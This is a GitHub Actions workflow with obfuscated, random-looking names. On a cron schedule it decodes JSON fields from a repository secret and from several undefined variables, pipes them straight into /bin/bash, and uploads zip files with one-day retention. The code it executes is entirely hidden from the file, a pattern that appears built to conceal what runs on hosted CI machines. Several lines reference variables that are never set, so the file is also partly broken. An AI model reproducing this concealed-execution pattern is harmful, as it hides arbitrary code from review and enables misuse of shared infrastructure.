name: fangyinxiali
on:
  workflow_dispatch:

  schedule:
    - cron: '34 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fangyinxiali
        env:
          lg9777: ${{ secrets.lg9777 }}
        run: |
          printf '%s' "$lg9777" | jq -r .vctct270 | /bin/bash
          echo $lgtf50 | jq -r .retos232 | /bin/bash
          echo $mwo25463 | jq -r .ct80258 | /bin/bash
          echo $s03 | jq -r .whrz38249 | /bin/bash
          echo $hor809 | jq -r .dw11927 | /bin/bash
          echo $b9 | jq -r .mcaze7202 | /bin/bash
          printf '%s' "$baplc38" | jq -r .n788 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: H48uGxuU
          path: "*.zip"
          retention-days: 1
